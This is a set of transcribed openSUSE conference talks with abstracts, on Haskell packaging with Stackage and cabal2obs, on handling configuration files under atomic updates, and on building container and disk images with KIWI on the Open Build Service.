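# optional: add a newer LTS package set from the devel project
# (project name and path below are illustrative, verify on build.opensuse.org)
zypper addrepo \
  https://download.opensuse.org/repositories/devel:/languages:/haskell:/lts:/8/openSUSE_Leap_42.2/ \
  haskell-lts-8
zypper refresh
```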
In Leap 42.2, you don't have that right now. You have an older compiler and an older package set, which is still fine for most purposes, but it's not the bleeding edge, because we stop updating that at a certain point so that we don't break our users' applications that they may have written. Then, for installing libraries that you want to work with, there is a central repository called Hackage, and people who write libraries that you can reuse typically register them on Hackage. So you have this large database of things that you can browse. And for every package that is on there, you can typically try installing ghc-<name of that package>-devel, and there is a really big chance that it will just work. So in openSUSE, we distribute a subset of Hackage, which is called Stackage. That's a variant, "stable Hackage". So we don't distribute everything that's up there, but we distribute a subset that fulfills certain requirements, like: it's regression-tested regularly, there is an address where you can report errors to, and they are actually fixed in some reasonable time frame. So the author maintains the package well, and there are certain quality assurance mechanisms in place. And I think Stackage covers today about 2,200 packages, which is, I don't know, maybe a fifth of Hackage or so. But the most interesting libraries are in there. And we have all of them in Tumbleweed. And I think we have almost all of them in Leap as well. And last but not least, there are tools written in Haskell which are not development libraries, and you can install those like any other tool. For instance, Pandoc is an extremely nice utility to convert text from one format to another. And the Haskell compiler, of course. And all of this is available via zypper. So now suppose you are on an older distribution, or you are on the commercial branch of SUSE Linux, and you don't have those packages right away available, or you have them available in a version that doesn't suit your needs. Then what you can always do is register any of those development projects which exist on OBS. The command is a bit unwieldy, but I think, yeah, you can figure it out if you want to. So basically what happens is that this LTS package set gets created at a certain point, it gets a version number like LTS 6, and then updates of packages go in only if they don't break the API. So if there is a bug-fix update, it will be updated in that package set. But if there is an update that breaks the API, it will not get into that package set. And then every year or so there is a new LTS version where they say, okay, latest of everything, and then we start the whole process over. So within that package set you have a stable development environment, and then you have different versions that use different major versions of the Haskell packages, and you can basically choose between any of those. So the latest one is currently LTS version 8. That's the one that we distribute here in this project, which is the development project for Factory. And so when you say you're on Leap 42.2 and you want the latest Haskell versions, the latest Haskell compiler, then you can just add that repository to your installation with zypper and it will work fine. Then suppose you've written a nice application in Haskell, a web application, say, and you want to deploy that on a whole bunch of machines and actually use it to provide services on the Internet.
Then this is a problem that the Haskell community has traditionally struggled with, and this is where I can just invite every Haskell hacker who wants to do that, give OpenSUSE a try because here it's actually very simple. The first thing that you can do, say you have written your application and you want to deploy it. The second way you can do that is just upload it to Hackage, get it registered into Stackage and then it takes a week or so and then we'll have it and we'll distribute it for you. So once you publish your code and you release it as free software, then OpenSUSE, a tumbleweed is automatically going to pick it up, and that means you can install it everywhere. Now maybe that's not suitable for you for some reason. Maybe, I don't know, the code is not open source or maybe tumbleweed is not for you. And you can always use the build service, which is also for everyone who doesn't know that, this is maybe the most useful service at all in all of OpenSUSE. You can get an account here for free, you can upload spec files for your packages and this thing will build them and will test them for you and it will distribute binaries for you and you can just use them wherever you want. The spec files that you do, you don't have to write them manually, you can generate them automatically for your Haskell projects, there's a tool called Cabal RPM, which is part of OpenSUSE of course, and you can feed a cabal file through that and you get a spec file out of it that you can register here and build your own application on the open build service and then you can install it everywhere. And last but not least, if you have a crazy complicated infrastructure that depends on very specific versions of very specific packages and this is all a lot of work, then you can use the tool that we use to build those development projects, which is called Cabal to OBS. It's open source, it's on GitHub, you can fork it, you can change, edit the package set, run it and then upload your own package set to the open build service and build very specialized environments that are particularly well suited for your needs. So in Haskell, builds are described by something called Cabal, there is a very clever abbreviation like common architecture for building things I don't remember. And this is basically a plain text file, which contains some meta information about your package, like what it's called, what's the version, what's the license, a short description, a synopsis, all these things that every package basically has. And then you also have, for instance, a library, an executable component in your package and these can depend on other Haskell packages like here and then they have this extra library stand so they can depend on system libraries. In this example, for instance, the package depends on open SSL and wants Zippert to install that for you for your build. Here you have an executable, which depends on Pandoc and example on the library. And so this is something, if you're developing Haskell package, this is a file you are going to write, this is something you'll probably do. And once you have that, you can generate a spec file from that automatically. And obviously this is the process that we also use when we, this project with those 2000 builds in there, we updated automatically from those Cabal files. We download the Cabal files from Hackage with a tool which is essentially a build system, right? It's written in Haskell. 
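A hypothetical .cabal file in the style described above; names, modules and version bounds are made up for illustration:

```
-- example.cabal: hypothetical package description
name:               example
version:            1.0.0
license:            BSD3
synopsis:           Small demo library and executable
build-type:         Simple
cabal-version:      >=1.10

library
  exposed-modules:  Example
  build-depends:    base >=4.8 && <5
  -- link against the system OpenSSL library, installed for the build via zypper
  extra-libraries:  ssl
  default-language: Haskell2010

executable example
  main-is:          Main.hs
  -- depends on pandoc and on the library of this very package
  build-depends:    base, pandoc, example
  default-language: Haskell2010
```

From a file like this, the cabal-rpm tool mentioned above can generate a spec file, which you can then build on the Open Build Service.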
So we basically get the latest version of everything and then we rebuild the repository and the process, I'm going to show it in more detail on the next slide, but the process basically creates the spec file. And we have, in this case, this update only shows an update for Pandoc for LTS8, but obviously we update all kinds of packages and all kinds of package sets. This is just one example to make it fit on the slide. So suppose that version has an update and we generate the spec file for it, we run spec cleaner over it, we basically run spec cleaner over everything. So we want our spec files to have a very consistent, consistent look and then we want spec cleaner to be a no op when you run it on it. And then for some packages, the Cabal file maybe doesn't contain sufficient information or maybe we have additional features we'd like to enable and then we have a set of patches that may be applied to every of those packages to patch the spec file into, I don't know, add additional features or fix the license tag, like in this case. And again, after every patch, we always run spec cleaner and in the end it says done, took seven seconds and now we have this LTS8 package set. And this is essentially a checkout from OBS, which we then commit and that's that. So this whole update process, I guess the point is the whole update process is automatic. There is no human, I mean sometimes something breaks because of a bug somewhere, but for the most part this is completely automatic. So this package set is always in an up to date state and nobody's actually manually doing anything about it, which is particularly nice. So when we generate the package set, we have this Cabal to every S utility, which also implements a lot of checks, which we learned over time are fairly important. So for instance, sometimes people specify a name of a license that doesn't exist and we know that's going to fail the review. So if we detect anything like that, we abort the build immediately. Then people write all kinds of nonsense into their package descriptions. Oftentimes it's something like see read me, which doesn't help us much. Sometimes it's just plain nonsense or it's something they copy pasted from the wrong package. And we make a good effort to detect these cases where these things don't add up and also abort the build so that we can fix it manually. And also what something people often do in Cabal files is that they confuse documentation and data files that they say, I have a read me and it's a data file, but no, it's a read me, it's documentation. And then we try to automatically fix that in the spec file so that our users have a find the read me in the proper location. Okay. So we generate the whole package said this is completely automatic. Then we committed into this double project into the LTS 8 project, which is a bit of a staging area. For the most part, things just compiled. Sometimes there is a build error for some reason, then we manually fix the build errors. And then when this development project is in a state where everything compiles, then we synchronize it into the proper development project for open source factory. And once it's in that project, it's going to submit, it's going to be submitted to factory mostly automatically. There is this OBS auto submitter, a nice service that the OBS team runs and it will automatically pick up the updates and submit them to factory. And then they show up and tumble with a couple of days later. So this whole stuff is all living on GitHub. 
The URL is on the next slide, I think. So you can mess with that. You can take a look at it if you want to. And the repository that we have contains obviously the package sets, the lists of packages and versions that we distribute. We have a bunch of packages that are not part of Stackash, but that we distribute anyway because they are useful for some reason. We have in some cases explicit build settings where we change the falls because we enable features that are not on by default or something like that. And then we have a set whole bunch of patches that improve the generated spec files. And I counted those things yesterday and I was very surprised that we have actually well over 230 packages that declare their license incorrectly. And this is, I think, the single most reason for failed reviews when we submit those things. So people, they say in their cabal file, I have a BSD2 license and then they have a BSD3 license file in there. Or some people say, I'm GPL and in fact, they are MIT license. And this is all very common. I don't know how people do that, but it's very common. So people have no idea what license their package is under. And then we fix it for them. This is, I have to say, one of the things that is really nice about OpenSUSE because when you download this stuff from us, then you can actually trust the license. So when the spec file says this is a BSD2 package, then it is a BSD2 package. But if you download it from Hackage, then it might not be. But in OpenSUSE, you have had a lawyer actually look at it and make sure that this information is accurate. So this is, I think, quite a nice added value. We have lots of fixes for package descriptions that didn't make any sense. Sometimes people upload release tar balls where files are missing. And we add them for them again and all kinds of things. I mean, distributing software is not as easy as it looks. OK. So if you want to know more, then these are the places to look at. Obviously, the Haskell website has the complete standard for the language. It has links to tutorials and everything. Stackage is the place to look for the stable package sets. If you want to mess with that. This is the repository for our software that we use to develop everything. And this is the development project and OBS. OK. I think it was fairly quick. So thank you very much for your attention. And if you have any questions, then shoot. Is there any plan to make Haskell available on ARM in open SUSE? It is not available for ARM V7 for the 32-bit port. Or at least I didn't find any. So the development project here. Well, maybe I can help out here. I'm Peter Trommner. I'm the maintainer of the compiler. So I'm actually responsible for initiating the 2000 packages attack, if you want to call it that. Currently we haven't installed the 32-bit binaries for GHC, for ARMs. Personally I don't know if I find the time to do it. But others have submitted a bootstrapping compiler. That's what we're missing in the past. And I mean, we could try. I don't know. I think we need a certain version of LLVM for the ARM ports to work. And the right version of LLVM is not available in the last LEAP version. Or 8.2 GHC version that's going to come out in June, I think. Well, that's the plan of GHC headquarters. They said they're going to support LLVM 39 or maybe even 40. We have both of those in factory or in tumbleweed. And I could give it a shot if I find the time. Or if somebody else wants to jump on it. And just send pull requests to develop languages Haskell. 
And I'll look at it and enable it if I can. But be a bit patient with the 8.2. It's not my main job. My students would get very angry if I said, well, I'm not preparing the lectures because I have to do the Haskell compiler. Thanks. I've got another question. So I'm from a university where we are working with tools regarding for application field of data mining. Is there something like tools like NumPy and SciPy available? I know, sorry, it's a problem question. But are there tools like NumPy and SciPy like Pandas for reading in data and processing it? Does anyone here in the audience also knows of that? Because that would be quite cool to apply. There is a special interest group in Haskell community that's concerned with data mining, machine learning, and they have produced a whole set of libraries. There is something, a very comprehensive binding to R, which allows you to mix R and Haskell. So you can write Haskell code and seamlessly interface to R and share results, which I think is probably a very good solution because R has the most sophisticated libraries in this area. And you have explicit machine learning libraries and visualization libraries that are written in Haskell. So I don't know, I'm not an expert in this field, so I don't know whether the stuff is as good as the Python libraries are, but there certainly is a sophisticated infrastructure there. Yeah, and it's open source, right? Well, thank you very much.
The functional programming language "Haskell" has been instrumental in researching the design of compilers, type systems, and advanced programming language features for more than 2 decades, but in recent years it has also become increasingly popular with red-blooded software engineers who worry about practical tasks like developing client/server systems, standalone applications, cryptography, finance solutions, or REST application back-ends. As it happens, openSUSE offers outstanding support for the Haskell language ecosystem and is therefore an ideal platform for discerning Haskell hackers who develop commercial-grade solutions. Both Tumbleweed and Leap support a whopping 2,200 Haskell packages that cover the entire LTS Haskell standard version 8.x. Furthermore, there exists a sophisticated infrastructure to easily maintain and update a package set of that size, which guarantees that important new releases make it into the distribution with a minimal delay. In this presentation, we would like to describe the current state of Haskell packaging in openSUSE, covering the following topics in particular: 1. Introduce Haskell briefly and explain why it kicks ass. 2. How can I install and set up a Haskell development environment with openSUSE Leap or Tumbleweed? 3. How can I package and deploy my own Haskell applications on openSUSE with the Open Build Service? 4. How does the underlying infrastructure work ("cabal2obs") that makes all this possible? The target audience for this presentation are Haskell programmers who would like to get started using openSUSE, openSUSE users who would like to get started with Haskell, and packagers who would like to get insights into an endeavor that maintains and updates several thousand spec files without major human intervention.
10.5446/54397 (DOI)
So, we have had a lot of great talks about MicroOS, Kubic and transactional updates in the last days already. We had to make a lot of changes in the last three years to make this a great product, things from very small to very intrusive and very big, but the good thing is nobody noticed; some people only noticed the changes we made after two years. So what we did worked fine and helps the people, but there is one big topic left, and this is our configuration files in case you are doing an atomic update, and that's what I want to speak about today. So my name is Thorsten Kukuk, I am a distinguished engineer at SUSE, and I am also the senior architect responsible for SLES and MicroOS. A little bit about the background: RPM configuration files. This is something every distribution has, and RPM as standard has some support for configuration files. If you don't mark your configuration file as special in the package, then all the changes of the user will be overwritten with the next update. If you mark it as a normal config file and you make a change to the configuration file in the package, then the one from the user will be moved away as .rpmsave and overwritten. If you mark it as %config(noreplace), then the modified configuration from the RPM is stored as .rpmnew beside it. This hasn't changed for many, many years. So at first glance everything must be okay, otherwise people would have changed it. But is really everything okay? So after every update, you have to look for .rpmsave and .rpmnew configuration files to get your services working again. And special thanks here to those people who continuously fix typos in comments in their configuration files marked as %config. It means after every update with a typo fixed in a comment, my configuration file is moved away and replaced by the default one, which is not working on my systems, and I have to go through all the .rpmsave and .rpmnew files to find out what has changed again and why my service is not coming up. Then you have to manage all the changes manually. Luckily, most of the changes are not that important or really visible to the service; it continues working. But if you really didn't take care after every update, it could be that your service will be insecure, not work as expected, or something similar. Now we introduced atomic updates, for us with transactional-update; there are other solutions for it. And that's getting even worse. So atomic updates mean either my update is applied fully and correctly, or not at all. There is no stage in between, like half of the RPMs are currently updated and services are seeing it, whatever. If everything applies fine and there are no mistakes, you make an atomic switch to the new system and everything is there and running. And if something fails, you can do an easy rollback to the old version. What does it mean for configuration files? So we create a copy of the current system and update this. This includes the configuration files, of course. And this also means that during the hidden update, we merge or adjust the configuration files with the new versions. Between this time and when the admin finally says now is a good point to activate our changes and reboot, you can do your own changes to configuration files. Which means before the reboot you have the visible configuration files with your changes, and, not visible, you have configuration files with changes done by us as the Linux distributor or by the packager or upstream software, and they are going out of sync.
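As a rough illustration of the window described above, assuming an openSUSE MicroOS-style system; the command names are the real transactional-update subcommands, the edited file name is made up, and the comments only restate what this talk describes:

```
transactional-update up         # prepare and update a new snapshot in the background
vi /etc/myservice.conf          # a change to the *running* /etc made now is not
                                # part of the new snapshot -- the two copies diverge
reboot                          # atomically switch to the new snapshot
transactional-update rollback   # if something went wrong, go back to the old snapshot
```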
With this reboot now, all changes made by the admin to the visible ones after applying the update are lost. So you have to manually find them and redo them again. And other problems are: how does the admin know that the versions, that the configuration, changed in the background, and how can he adjust them before the reboot? So we have a lot of open questions here on how to handle configuration files correctly in the case of an update. There's also something called factory reset in systemd. There was a blog post about it. In the end it means I can delete /etc, and with the next reboot everything will be recreated again and the system is in the state as I deployed it, without any changes. Some people like this idea, but no Linux distributor did implement it. Most likely because it's not really tractable, it's a lot of work, it's a lot of changes to packages, whatever. I don't know exactly why. So this all together leads me to the problem we are having today, which is that most Linux distributors have a Linux distribution with atomic updates. For example, it's openSUSE MicroOS for us, it's CoreOS, Fedora or Red Hat Atomic, it's Ubuntu Core. So there are many, and they all have faced the same problem of how to update the configuration files in /etc, and they all did come up with their own solution. Which means it's different on every Linux distribution. Which reminds me a little bit of the times before we had the Filesystem Hierarchy Standard, where on every Linux distribution the configuration files, applications, everything was stored in another place and the file system layout was completely different. So now if you have a solution for a package for your distribution with atomic updates and you speak to the upstream developers, they say it's working for the usual standard Linux distribution, desktop or server, and for atomic updates everybody is doing something else, so I would have to implement several ways every time for only one distribution, so they are not interested in it. So that makes it also pretty hard to solve the problem for our products. And this is the goal I try to solve, or what I have: my goal is that independent of which Linux distribution with atomic updates you are using, the user would always find the configuration files in the same place. As an example, most of the atomic-update distributions have the user database not in /etc, there is only a dummy there for the user, but somewhere under /usr or somewhere else. I very often got told CoreOS is much more secure than my MicroOS because CoreOS has only one user, and that is root. Besides that I don't think that having only one account and everything running as one account is really secure, it's not true either, and I always show them where under /usr they can find the real passwd file. So this is always surprising for the people; they know it from one distribution, and the next is different, and the next is again different. So users should find the configuration and everything in the same location, or in the same way, so that they know how to look for it. It should also create guidance for developers so that they develop new software in a way that it works from the beginning with transactional updates. For the midterm I want to have a solution for atomic updates for a small set of packages only, like we use in openSUSE MicroOS. Long-term it would be good if we can do it for the whole distribution, not only for a few packages, and that it is really consistent across.
So, what I don't want, to take away the fear of some people I always hear in talks about this: it would not become a requirement for all packages, and we would not start now to adjust all packages to follow the new layout. If there is a package which already has a solution for this, like systemd, don't confuse people by moving everything around today, it's not helpful. If this is something people really like, it will come by itself; if not, then it doesn't really matter. And if you think about a solution, what are the requirements for it? The ones I created in discussions with my team and other people are: it needs to be visible to the admin that configuration files got updated and that you maybe need to look at them. It must also be visible for the admin which are his own changes, so that he knows if he has to merge something he changed. And in the best case, optimally, the changes would be merged automatically. Now I want to come to some proposals. We have different kinds of configuration files, that's why we need more than one proposal. We cannot do one for everything, and not for every problem have we found a good solution yet. But if you look at the standard application configuration files, there is a good solution: look at how systemd is doing it. systemd has /usr/lib/systemd with the distributor defaults, and /etc/systemd where you can override it. So you can copy the configuration file from /usr/lib to /etc and adjust it, then your version is used and you still have the unmodified original version in /usr/lib. Or, if you only want to override one or two single values and if it's possible with the format of the configuration file, you can create a .d directory and put in only a file, or several files, which will override a single option and not the whole file. This also helps you later to find out what you changed, because if you have a long file with, let's say, 100 options, it's hard to find out which ones you changed. But if you have five files, every file with one option, then you immediately see what you really did change there. Take a look at the systemd.unit manual page; there is a good example of how this works and how it could look. So at first glance it looks like it's a lot of coding work, I would have to touch every package, every piece of software, to implement it. That was my first impression when I started looking into these problems too. But if you take a closer look at openSUSE Tumbleweed and /etc, you will find out it's not that much work, at least not for the core packages, because most core packages already have something built in which is similar or also solves the problem, but we don't use it. For example PAM: we have /etc/pam.d, we have /usr/lib/pam.d. Nobody knows about /usr/lib/pam.d. I'm one of the old Linux PAM maintainers and completely forgot that this directory exists, and only found out by accident when looking at another Linux system. So for PAM, we only need to adjust our packaging and we have it more or less for free. sysctl: we also have a lot of directories, under /usr/lib and /etc. So packages could install their config file in /usr/lib, not in /etc, and the admin could override our distribution-specific settings in /etc and always see what he changed and always see what our defaults are. ldconfig is also something similar. We use /etc/ld.so.conf.d. We install our... well, they are not really configuration files in that sense, because no user will ever modify the files we install there.
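A minimal sketch of the systemd-style layering described above, for a hypothetical example.service; the drop-in file below is valid systemd syntax and the paths show where vendor default and admin override live:

```
# vendor default shipped by the package (never edited by the admin):
#   /usr/lib/systemd/system/example.service

# admin override of a single option, as a drop-in file:
#   /etc/systemd/system/example.service.d/local.conf
[Service]
Environment=EXAMPLE_DEBUG=1
```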
So in my opinion, they shouldn't be in /etc if the admin never touches them, modifies them, or cannot even modify them. These are only a few examples. If you look at /etc, you will find a lot of tools which already have .d directories, and I didn't check everything. Maybe they already have support for several of them, but if not, it should be easy to enhance them to support it. So the first thing we should look at is what our applications already support today to solve the update problem, and enable it and adjust our packaging so that we can use that. Another thing is that there are config file parsers for every language, for Perl, Go, C, C++, Ruby, and very few, but some of them, already support the systemd-like setup, too. For example, I found one written in Go, go-ini. There is also somebody in my team currently working on a C implementation of a library that has only one config interface, and the library in the back end is merging all the configuration files for the application. So that also helps a lot to adjust applications in an easy way and is not really intrusive. Another, different case is what I call system databases. These are, strictly speaking, not really configuration files, but every system has an /etc/rpc, /etc/services, /etc/protocols. It's quite easy to move them to something under /usr, and we also have NSS plug-ins which could look first in /etc and, if they don't find the entry there, look in /usr, and if they find the entry there, use that. So that is really only a packaging thing. I used the path /usr/share/defaults/etc there, because this path, this directory, is already used by Tumbleweed, or was used by packages, before I started looking into this. I know from discussions already that some people don't like it; I continue to use it in my slides because it's already there and used, but the directory is something we also still need to discuss. It's not optimal: for example, a passwd entry is not system-independent, so it doesn't belong into share. There could be other configuration files which are system-dependent; they don't belong into share, so maybe /usr/etc would be something better, but more on that at the end. So /etc/passwd, the /etc/group file, the /etc/shadow file: to be honest, we didn't find a good solution yet. We made many proofs of concept. One was also an /etc/shadow.d directory, an /etc/group.d directory. It's quite easy with NSS plug-ins to have all applications read this merged in, without any changes to the applications, only to the /etc/nsswitch.conf configuration file. But every time you then think about changing a password or creating a new user, it's really a huge amount of work to adjust all the possible tools there. So the best we currently have, and if somebody has better ideas, I would be really happy to hear them: create system accounts under /usr/share/defaults or whatever, and normal accounts created by the user in /etc. This has a drawback: if the admin creates a system account, you can again have a UID clash, because there could already be something in the hidden file; and use an NSS plug-in to read them. This does not really solve all problems. nss_compat, still used by many people, wouldn't work anymore. And as I said with the example from CoreOS users, it's confusing if people don't see all passwords, all users, in /etc anymore. They need to know where to look for the real ones and how to look them up. Default locations: as I already said, below /usr we need a place to store configuration files so that people will find them.
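For illustration only: an /etc/nsswitch.conf along these lines, where "usrfiles" stands for a hypothetical NSS module that reads the vendor copies below /usr, while "files" keeps reading the admin-managed files in /etc:

```
# /etc/nsswitch.conf -- illustrative sketch, "usrfiles" is a placeholder name
passwd:     files usrfiles
group:      files usrfiles
shadow:     files usrfiles
services:   files usrfiles
protocols:  files usrfiles
rpc:        files usrfiles
```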
Currently it's like in pre-Filesystem-Hierarchy-Standard times: everybody has something else. So it should be easy to find for users and easy to remember for system administrators; best is all in one place. Don't clobber /usr/lib even more: there are already so many files and directories in /usr/lib that it's really hard to find something there anymore. Find a solution which does not conflict with the Filesystem Hierarchy Standard, or we need to adjust it. I'm afraid we need to adjust it; even if it is nearly dead, I hope that we can reactivate it and come to a conclusion there. The names of the directories should not confuse administrators, so they should know what it is. And it should be clear that this is the default location for the distribution-supplied configuration files and not the place where they have to edit the files; they still need to do that in /etc. As I said, many Linux distributions have their own solution already. Here is a list of what the different ones use. /usr/share/defaults is what Clear Linux and several Tumbleweed packages are already using. /usr/share/baselayout is what is used by CoreOS Container Linux. /writable is used by Ubuntu Core. /usr/etc is used by MicroOS, Red Hat and Fedora or CentOS Atomic. Another directory under /usr/share was a suggestion; my biggest problem here is the "share" part, because what do we do if applications or people have something architecture-specific that we cannot store in share? Those were my favourites when I wrote the slides; I am not that sure anymore. I chose /usr/share/defaults as the top directory because it is already in use in Tumbleweed. But we are thinking about passwd, group, shadow, which don't really fit there. The idea was to move them to yet another directory under /usr, but that is really hard for people to find and it is even more confusing to have different places. I think maybe /usr/etc would be the best choice, as already used by Fedora, Red Hat and openSUSE MicroOS, but this is really something that needs to be discussed in a broader round. Now I am at the end. There is a longer, more detailed proposal in my GitHub directory. I will also put the slides in there. There is much more written there, also background on why some things are as they are, or why things we already tried are not working. And are there now questions from you, suggestions, ideas? I am happy about every bit of feedback. So, what I take from your talk is primarily that we need more modularity in configuration files. So the tools which read configuration files should already provide a way to provide some modularity. From my experience that is also the way to go. So just two remarks. When we talk about authentication databases, passwd, group and so on, maybe the problem isn't that critical, because usually, if you distinguish system accounts from, say, user accounts in a bigger infrastructure, the user accounts are usually not provided from local databases but from a directory or whatever, for example using SSSD. So maybe this would be a way to circumvent those problems you have mentioned. Yes, it is also an idea to store them in LDAP or whatever. That is also a reason why we currently don't see it as critical to solve, because really, if you have more than one machine, you normally either have very few accounts, or in a big network you have something like LDAP, Active Directory or whatever for this.
The problem is really if the admin creates a system account for software he needs to install, and then there is a clash. The consequences of that are not big, that is why we currently ignored it, but this is something we would like to solve in a generic way for everybody. The second thing is, I am not that sure, but I am also not an expert in that area, whether the existing PAM files really solve the problem of modularity in PAM. Do you have some experience with that? But maybe we could clarify this in a personal conversation. Yes and no. So they don't really solve it if you only have /usr/lib/pam.d, but there is also the include directive, and with this it is possible to solve it. Yes, it is not easy for the admin, but it is a first step. And I don't think, after what I would say are many, many years of quiet PAM development, because the company that owned the protocol or the definition doesn't exist anymore, that anybody is willing to come up with a PAM version 2 or whatever, because with SSSD and whatever it is too much in use to really replace it. I think we need to go in small steps to make it easier. One is already that the admin can override it and still see what we are doing. But yes, as I said, not everything is solved. This is still an open issue, minor or major, but having done the first step, the next one is much easier. And I think the last question then is for a personal conversation. Have you ever found a way to set the default umask in a modular way? I haven't, but we can clarify this in a personal conversation. I think it is a personal one. Thank you. Have you also considered changing the way that passwd, group and shadow are managed entirely? I mean replacing the complete thing in a way. So as I said, we made several proofs of concept. There are ideas to store it in a database and have a daemon fetching it out of it. We are not really happy with any one of them. If somebody has a good idea for doing something completely different, that is also fine. But there are some things to remember. One thing is that there are two interfaces. One is the one which is reading it: it is the NSS interface of glibc. So everything for which you can provide an NSS plug-in is fine for reading. The second thing is, and it is a big issue we always see, you need a lot of tools which modify a password, which modify an account, which make changes to it. And what we were looking for, to get accepted more easily by people, is something where they don't feel they need to learn something completely new and have to touch 100 packages and applications and rewrite big parts of their code. So there are many options, there are many ideas. Nobody had the time to come up with a proof of concept which really solves the issue and would be accepted by many people. If you have a good idea how to store it in another way which solves the problem, great. I'm really glad if you could tell it to us, if we can discuss it; I'm really open there, and there is no no-go, except that you don't want to touch the currently existing interfaces. More questions? Okay, so I will submit this in the next days to the factory mailing list and hope to get more ideas and comments there so that we can start to make changes. Only as feedback in this round: if we would say we start, for openSUSE, modifying all applications' configuration files, would you support it, would you help to move it, do you think it's a good idea to modularize it, or do you think: no, I will not touch my packages, I will not help? So, who would be in favor and help moving this forward in their packages, or likes the idea?
Only one, two, okay, four. The majority, who doesn't care at all? Okay, less. So the majority: you don't support it, you don't like it, or does nobody really dislike it? So many people need to think more about it. Then I want to thank you for coming so early, and I hope for more long-term discussions on the factory mailing list. Thanks.
The great thing about atomic updates as used e.g. with transactional-update is that your system is always in a defined state. But what happens with changes in /etc? With normal updates, changes are done immediately to /etc during the update. With atomic updates, they are only visible with the next reboot. Which means changes to /etc between update and reboot can create a conflict. There are several strategies used by other distributions, like three-way diff and patching, symlinks, ignoring the problem, etc. In this talk I will mention the biggest challenges we see, which solutions exist, what their advantages and disadvantages are, and which impact this will have on normal distributions like openSUSE Tumbleweed. This talk is meant to create awareness of the problem and as a base for discussions; it will not provide a solution for every problem. It's targeting application developers and distribution developers, as these are the areas where changes would be necessary.
10.5446/54398 (DOI)
So, welcome back from lunch, everyone. I hope you found something to eat. And I'm not hungry anymore. I'm here to talk about how you can build images containing openSUSE with openSUSE. I'm Fabian Vogt. I'm working for SUSE as a release engineer, specializing in building OS images. And by images, I, of course, mean container images, stuff you find on Docker Hub, openSUSE Leap, for instance, for various versions. And for Leap, JeOS, live CDs, also for Tumbleweed. This is how such an image looks in OBS. You can see some files there, and on the right side you see some builds which luckily succeeded. That's how the behind-the-scenes stuff works. As you can already see, we're using the Open Build Service, of course. It's not only used for packages, but it also supports images. So you probably used OBS for downloading RPMs, but it can also handle images: building images and pulling in dependencies of images and all of that stuff. It's a central tool to develop openSUSE. So every distro you can find for openSUSE is built on the Open Build Service. It's a central tool for everything. And OBS uses, of course, a tool for building images. OBS doesn't do anything itself. It just calls other tools. And in this case, it's KIWI. Yes, that's the official KIWI logo. And I did not find it in a higher resolution. But if you did, yes, just send it to me. But I think it's not really worth showing it bigger. It's literally a kiwi with some openSUSE logos copy-pasted onto it. It has integration into OBS. That's the OBS part, which you'll learn more about later. It can not only build images with openSUSE, it can also build images with Fedora, Ubuntu, all that stuff. The components of an image are various. In the end, we, of course, want to have some container images or bootable disk images, which, using KIWI, are actually not that different. KIWI, of course, produces those images from a configuration file, which is called image.kiwi. You can also give it a different file name, but you have to make sure that it ends with .kiwi. Otherwise, OBS does not know how to actually build your package. This KIWI file contains metadata about the image, stuff like what the file name should be, whether it's bootable, which architecture should have which packages, and also the version number. OBS reads this KIWI file and then knows which packages it has to download from other projects, which are defined in the OBS project config, and then starts a build using those RPM packages it collected and calls KIWI. You can also supply a shell script, which is called in the chroot of the image and which is just a shell script called using bash normally. And you can really do whatever you want in there. You can call systemctl, you can remove files, write files, also remove all the files you installed, but that's probably a bad idea. And you can also add custom files using archives. In this case, it's just a single archive. Normally, you should avoid adding custom files in image builds, as we have RPMs for that. Works much better. A KIWI image description is a fairly complex XML file. And you can probably not read any of that text, but don't worry. The top part of the KIWI file contains, obviously, an XML header, because it's an XML file. And then some mysterious magic comments, which tell OBS stuff it doesn't know otherwise, like KIWI profiles or, for Docker containers, which repositories to use.
Below that, the image description is defined, which means the name of the image, the file name, the author of the image, and also profiles, which I'll get into in more detail later if I have enough time. The next part is somewhat more image-specific: for containers you can define labels there; for other image types you define which filesystem to use, for instance btrfs, or whether to use GRUB in legacy mode or (U)EFI mode, whether to enable Secure Boot, or which btrfs volumes to use. It also defines the version of the image, which is part of the file name, and some miscellaneous stuff like whether to install the documentation of packages or not — I'll get into more detail on that later as well. The last part is probably the most important part of the image, because it defines the list of packages actually installed in the image. At the top you also have to define which repositories to use, but as we are building on OBS, we don't have any URLs to define; we just tell it to use the repositories OBS has configured. And then we have the list of packages in various groups, like bootstrap — which you normally shouldn't care about unless you do some weird stuff — and the list of packages in the image. The good thing is, you don't have to write such an XML file from scratch, and you also don't have to take care of the OBS project configuration for that. You can just go on build.opensuse.org, click on "New Image" after you're logged in, and then you get a selection like this, where you can choose: I want an image based on openSUSE Leap, I want to build an image using KIWI, a derived Docker container using KIWI, or a container using a Dockerfile. For containers and other kinds of images, size is very important. For instance, our Docker images are usually around 40 megabytes, sometimes just below 50, but we really try not to exceed 50 megabytes — because the base image is, of course, the base image, and if you make it bigger, everyone using the base image or any derived image also loses that much space on their hard drive. And if you use multiple derived images based on different versions of the base container, that is obviously even more severe if there are some megabytes of wasted space in there. Also ISO images like live CDs have a limit depending on which flavor they are: the rescue CD obviously has to fit on a CD, so it cannot exceed 700 megabytes, and the other live media have a hard, artificial limit of 1 gigabyte — we just cannot exceed that. The most important part of the image building process is the package selection. First, you have to be sure that you actually know the use case of the image. If you don't know what the image is used for, you can't do a reliable and useful package selection. If you aren't sure whether a package should be included or not, you should redefine your use case and look at it again — maybe you should build two images for two different use cases if they are too different. (Is this working? Good.) It's also important not to break hard dependencies. It definitely causes breakage if you say: I want to install package A, but package A depends on package B, and I don't want B. That doesn't work. If there is actually a use case where you can install a package but ignore some of its hard dependencies, that's a sign that the dependency is actually wrong and should be replaced by a soft dependency like Recommends.
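To tie those pieces together, here is a rough, hand-written sketch of what a small image description along those lines could look like. Treat it as illustrative only: the image name, author and package list are made up, the schema version may differ for your KIWI, and the magic comment at the top is just the kind of OBS hint mentioned above (it only matters once you use profiles/multibuild).

<?xml version="1.0" encoding="utf-8"?>
<!-- OBS-Profiles: @BUILD_FLAVOR@ -->
<image schemaversion="6.8" name="example-image">
  <description type="system">
    <author>Jane Doe</author>
    <contact>jane@example.com</contact>
    <specification>Example openSUSE container image</specification>
  </description>
  <preferences>
    <type image="docker">
      <containerconfig name="example/tumbleweed" tag="latest"/>
    </type>
    <version>1.0.0</version>
    <packagemanager>zypper</packagemanager>
    <rpm-excludedocs>true</rpm-excludedocs>
  </preferences>
  <repository type="rpm-md">
    <!-- resolved by OBS against the repositories configured for the project -->
    <source path="obsrepositories:/"/>
  </repository>
  <packages type="image">
    <package name="openSUSE-release"/>
    <package name="zypper"/>
  </packages>
  <packages type="bootstrap">
    <package name="filesystem"/>
  </packages>
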